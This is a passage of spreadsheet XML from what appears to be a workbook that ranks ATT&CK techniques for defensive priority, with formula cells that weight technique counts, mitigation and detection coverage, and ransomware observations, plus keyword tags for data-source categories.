        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS304" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.19047619047619047</v>
      </c>
      <c r="AT304" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.19047619047619047</v>
      </c>
      <c r="AU30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16.969585848828419</v>
      </c>
    </row>
    <row r="305" spans="1:47" ht="34">
      <c r="A305" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.4</v>
      </c>
      <c r="B305" s="37">
        <f t="shared" si="4"/>
        <v>126.23809523809524</v>
      </c>
      <c r="C305" s="37" t="s">
        <v>1073</v>
      </c>
      <c r="D305" s="50" t="s">
        <v>1072</v>
      </c>
      <c r="E305" s="37" t="s">
        <v>1074</v>
      </c>
      <c r="F305" s="37">
        <v>1</v>
      </c>
      <c r="G305" s="37">
        <v>1</v>
      </c>
      <c r="H305" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I305" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J305" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K305" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L305" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M305" s="37">
        <v>0</v>
      </c>
      <c r="N305" s="56">
        <v>0</v>
      </c>
      <c r="O305" s="56">
        <v>1</v>
      </c>
      <c r="P305" s="56">
        <v>0</v>
      </c>
      <c r="Q305" s="56">
        <v>0</v>
      </c>
      <c r="R305" s="57"/>
      <c r="S305" s="57">
        <v>0</v>
      </c>
      <c r="T305" s="57"/>
      <c r="U305" s="57">
        <v>0</v>
      </c>
      <c r="V305" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>4.7619047619047615E-3</v>
      </c>
      <c r="W305" s="37">
        <v>0</v>
      </c>
      <c r="X305" s="37">
        <v>0</v>
      </c>
      <c r="Y305" s="37">
        <v>0</v>
      </c>
      <c r="Z305" s="37">
        <v>1</v>
      </c>
      <c r="AA305" s="37">
        <v>0.01</v>
      </c>
      <c r="AB305" s="37">
        <v>0.01</v>
      </c>
      <c r="AC305" s="37"/>
      <c r="AD305" s="50" t="s">
        <v>131</v>
      </c>
      <c r="AE305" s="37" t="str" cm="1">
        <f t="array" ref="AE305">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD305)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF305" s="37">
        <v>301</v>
      </c>
      <c r="AG305" s="37" t="str" cm="1">
        <f t="array" ref="AG305">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD305)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH305" s="37">
        <v>301</v>
      </c>
      <c r="AI305" s="37" t="str" cm="1">
        <f t="array" ref="AI305">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD305)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ305" s="37">
        <v>301</v>
      </c>
      <c r="AK305" s="37" t="str" cm="1">
        <f t="array" ref="AK305">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD305)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL305" s="37">
        <v>301</v>
      </c>
      <c r="AM305" s="37" t="str" cm="1">
        <f t="array" ref="AM305">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD305)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN305" s="37">
        <v>0</v>
      </c>
      <c r="AO305" s="37">
        <v>3</v>
      </c>
      <c r="AP305" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.4</v>
      </c>
      <c r="AQ305" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>42.079365079365083</v>
      </c>
      <c r="AR305" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS305" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.14285714285714285</v>
      </c>
      <c r="AT305" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.14285714285714285</v>
      </c>
      <c r="AU30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3.0770975056689345</v>
      </c>
    </row>
    <row r="306" spans="1:47" ht="34">
      <c r="A306" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B306" s="37">
        <f t="shared" si="4"/>
        <v>120.9</v>
      </c>
      <c r="C306" s="37" t="s">
        <v>1075</v>
      </c>
      <c r="D306" s="50" t="s">
        <v>1072</v>
      </c>
      <c r="E306" s="37" t="s">
        <v>1076</v>
      </c>
      <c r="F306" s="37">
        <v>1</v>
      </c>
      <c r="G306" s="37">
        <v>1</v>
      </c>
      <c r="H306" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I306" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J306" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K306" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L306" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M306" s="37">
        <v>0</v>
      </c>
      <c r="N306" s="56">
        <v>0</v>
      </c>
      <c r="O306" s="56">
        <v>0</v>
      </c>
      <c r="P306" s="56">
        <v>0</v>
      </c>
      <c r="Q306" s="56">
        <v>0</v>
      </c>
      <c r="R306" s="57"/>
      <c r="S306" s="57">
        <v>0</v>
      </c>
      <c r="T306" s="57"/>
      <c r="U306" s="57">
        <v>0</v>
      </c>
      <c r="V306" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W306" s="37">
        <v>0</v>
      </c>
      <c r="X306" s="37">
        <v>0</v>
      </c>
      <c r="Y306" s="37">
        <v>0</v>
      </c>
      <c r="Z306" s="37">
        <v>0</v>
      </c>
      <c r="AA306" s="37">
        <v>0</v>
      </c>
      <c r="AB306" s="37">
        <v>0</v>
      </c>
      <c r="AC306" s="37"/>
      <c r="AD306" s="50" t="s">
        <v>131</v>
      </c>
      <c r="AE306" s="37" t="str" cm="1">
        <f t="array" ref="AE306">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD306)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF306" s="37">
        <v>302</v>
      </c>
      <c r="AG306" s="37" t="str" cm="1">
        <f t="array" ref="AG306">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD306)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH306" s="37">
        <v>302</v>
      </c>
      <c r="AI306" s="37" t="str" cm="1">
        <f t="array" ref="AI306">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD306)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ306" s="37">
        <v>302</v>
      </c>
      <c r="AK306" s="37" t="str" cm="1">
        <f t="array" ref="AK306">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD306)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL306" s="37">
        <v>302</v>
      </c>
      <c r="AM306" s="37" t="str" cm="1">
        <f t="array" ref="AM306">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD306)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN306" s="37">
        <v>0</v>
      </c>
      <c r="AO306" s="37">
        <v>1</v>
      </c>
      <c r="AP306" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ306" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>40.300000000000004</v>
      </c>
      <c r="AR306" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS306" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT306" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU30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0.98333333333333339</v>
      </c>
    </row>
    <row r="307" spans="1:47" ht="34">
      <c r="A307" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="B307" s="37">
        <f t="shared" si="4"/>
        <v>127.07619047619048</v>
      </c>
      <c r="C307" s="37" t="s">
        <v>1077</v>
      </c>
      <c r="D307" s="50" t="s">
        <v>1072</v>
      </c>
      <c r="E307" s="37" t="s">
        <v>1078</v>
      </c>
      <c r="F307" s="37">
        <v>1</v>
      </c>
      <c r="G307" s="37">
        <v>1</v>
      </c>
      <c r="H307" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I307" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J307" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K307" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L307" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M307" s="37">
        <v>0</v>
      </c>
      <c r="N307" s="56">
        <v>0</v>
      </c>
      <c r="O307" s="56">
        <v>0</v>
      </c>
      <c r="P307" s="56">
        <v>0</v>
      </c>
      <c r="Q307" s="56">
        <v>1</v>
      </c>
      <c r="R307" s="57"/>
      <c r="S307" s="57">
        <v>0</v>
      </c>
      <c r="T307" s="57"/>
      <c r="U307" s="57">
        <v>0</v>
      </c>
      <c r="V307" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>4.7619047619047615E-3</v>
      </c>
      <c r="W307" s="37">
        <v>0</v>
      </c>
      <c r="X307" s="37">
        <v>0</v>
      </c>
      <c r="Y307" s="37">
        <v>0</v>
      </c>
      <c r="Z307" s="37">
        <v>1</v>
      </c>
      <c r="AA307" s="37">
        <v>0.01</v>
      </c>
      <c r="AB307" s="37">
        <v>0.01</v>
      </c>
      <c r="AC307" s="37"/>
      <c r="AD307" s="50" t="s">
        <v>131</v>
      </c>
      <c r="AE307" s="37" t="str" cm="1">
        <f t="array" ref="AE307">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD307)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF307" s="37">
        <v>303</v>
      </c>
      <c r="AG307" s="37" t="str" cm="1">
        <f t="array" ref="AG307">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD307)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH307" s="37">
        <v>303</v>
      </c>
      <c r="AI307" s="37" t="str" cm="1">
        <f t="array" ref="AI307">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD307)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ307" s="37">
        <v>303</v>
      </c>
      <c r="AK307" s="37" t="str" cm="1">
        <f t="array" ref="AK307">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD307)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL307" s="37">
        <v>303</v>
      </c>
      <c r="AM307" s="37" t="str" cm="1">
        <f t="array" ref="AM307">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD307)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN307" s="37">
        <v>0</v>
      </c>
      <c r="AO307" s="37">
        <v>2</v>
      </c>
      <c r="AP307" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="AQ307" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>42.358730158730161</v>
      </c>
      <c r="AR307" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS307" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT307" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU30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2.0647014361300076</v>
      </c>
    </row>
    <row r="308" spans="1:47" ht="34">
      <c r="A308" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B308" s="37">
        <f t="shared" si="4"/>
        <v>211.52595866666664</v>
      </c>
      <c r="C308" s="37" t="s">
        <v>1079</v>
      </c>
      <c r="D308" s="50" t="s">
        <v>1080</v>
      </c>
      <c r="E308" s="37"/>
      <c r="F308" s="37">
        <v>1</v>
      </c>
      <c r="G308" s="37">
        <v>0</v>
      </c>
      <c r="H308" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I308" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J308" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K308" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0</v>
      </c>
      <c r="L308" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="M308" s="37">
        <v>0</v>
      </c>
      <c r="N308" s="56">
        <v>0</v>
      </c>
      <c r="O308" s="56">
        <v>0</v>
      </c>
      <c r="P308" s="56">
        <v>1</v>
      </c>
      <c r="Q308" s="56">
        <v>7</v>
      </c>
      <c r="R308" s="57">
        <v>7.6</v>
      </c>
      <c r="S308" s="57">
        <v>1</v>
      </c>
      <c r="T308" s="57" t="s">
        <v>610</v>
      </c>
      <c r="U308" s="57">
        <v>8</v>
      </c>
      <c r="V308" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.12380933333333333</v>
      </c>
      <c r="W308" s="37">
        <v>9</v>
      </c>
      <c r="X308" s="37">
        <v>0.163636</v>
      </c>
      <c r="Y308" s="37">
        <v>0.163636</v>
      </c>
      <c r="Z308" s="37">
        <v>8</v>
      </c>
      <c r="AA308" s="37">
        <v>0.08</v>
      </c>
      <c r="AB308" s="37">
        <v>0.08</v>
      </c>
      <c r="AC308" s="37"/>
      <c r="AD308" s="50" t="s">
        <v>1081</v>
      </c>
      <c r="AE308" s="37" t="str" cm="1">
        <f t="array" ref="AE308">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD308)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF308" s="37">
        <v>304</v>
      </c>
      <c r="AG308" s="37" t="str" cm="1">
        <f t="array" ref="AG308">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD308)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH308" s="37">
        <v>304</v>
      </c>
      <c r="AI308" s="37" t="str" cm="1">
        <f t="array" ref="AI308">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD308)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ308" s="37">
        <v>304</v>
      </c>
      <c r="AK308" s="37" t="str" cm="1">
        <f t="array" ref="AK308">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD308)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL308" s="37">
        <v>304</v>
      </c>
      <c r="AM308" s="37" t="str" cm="1">
        <f t="array" ref="AM308">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD308)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AN308" s="37">
        <v>0</v>
      </c>
      <c r="AO308" s="37">
        <v>0</v>
      </c>
      <c r="AP308" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ308" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>70.508652888888875</v>
      </c>
      <c r="AR308" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS308" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT308" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU30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09" spans="1:47" ht="34">
      <c r="A309" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B309" s="37">
        <f t="shared" si="4"/>
        <v>177.335598</v>
      </c>
      <c r="C309" s="37" t="s">
        <v>1082</v>
      </c>
      <c r="D309" s="50" t="s">
        <v>1080</v>
      </c>
      <c r="E309" s="37" t="s">
        <v>1083</v>
      </c>
      <c r="F309" s="37">
        <v>1</v>
      </c>
      <c r="G309" s="37">
        <v>0</v>
      </c>
      <c r="H309" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I309" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J309" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K309" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0</v>
      </c>
      <c r="L309" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="M309" s="37">
        <v>0</v>
      </c>
      <c r="N309" s="56">
        <v>0</v>
      </c>
      <c r="O309" s="56">
        <v>0</v>
      </c>
      <c r="P309" s="56">
        <v>0</v>
      </c>
      <c r="Q309" s="56">
        <v>0</v>
      </c>
      <c r="R309" s="57" t="s">
        <v>1084</v>
      </c>
      <c r="S309" s="57">
        <v>2</v>
      </c>
      <c r="T309" s="57" t="s">
        <v>610</v>
      </c>
      <c r="U309" s="57">
        <v>8</v>
      </c>
      <c r="V309" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>9.5238000000000003E-2</v>
      </c>
      <c r="W309" s="37">
        <v>10</v>
      </c>
      <c r="X309" s="37">
        <v>0.18181800000000001</v>
      </c>
      <c r="Y309" s="37">
        <v>0.18181800000000001</v>
      </c>
      <c r="Z309" s="37">
        <v>0</v>
      </c>
      <c r="AA309" s="37">
        <v>0</v>
      </c>
      <c r="AB309" s="37">
        <v>0</v>
      </c>
      <c r="AC309" s="37"/>
      <c r="AD309" s="50" t="s">
        <v>1081</v>
      </c>
      <c r="AE309" s="37" t="str" cm="1">
        <f t="array" ref="AE309">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD309)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF309" s="37">
        <v>305</v>
      </c>
      <c r="AG309" s="37" t="str" cm="1">
        <f t="array" ref="AG309">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD309)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH309" s="37">
        <v>305</v>
      </c>
      <c r="AI309" s="37" t="str" cm="1">
        <f t="array" ref="AI309">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD309)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ309" s="37">
        <v>305</v>
      </c>
      <c r="AK309" s="37" t="str" cm="1">
        <f t="array" ref="AK309">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD309)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL309" s="37">
        <v>305</v>
      </c>
      <c r="AM309" s="37" t="str" cm="1">
        <f t="array" ref="AM309">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD309)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AN309" s="37">
        <v>0</v>
      </c>
      <c r="AO309" s="37">
        <v>0</v>
      </c>
      <c r="AP309" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ309" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>59.111865999999999</v>
      </c>
      <c r="AR309" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS309" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT309" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU30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10" spans="1:47" ht="34">
      <c r="A310" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B310" s="37">
        <f t="shared" si="4"/>
        <v>183.74988333333334</v>
      </c>
      <c r="C310" s="37" t="s">
        <v>1085</v>
      </c>
      <c r="D310" s="50" t="s">
        <v>1080</v>
      </c>
      <c r="E310" s="37" t="s">
        <v>1086</v>
      </c>
      <c r="F310" s="37">
        <v>1</v>
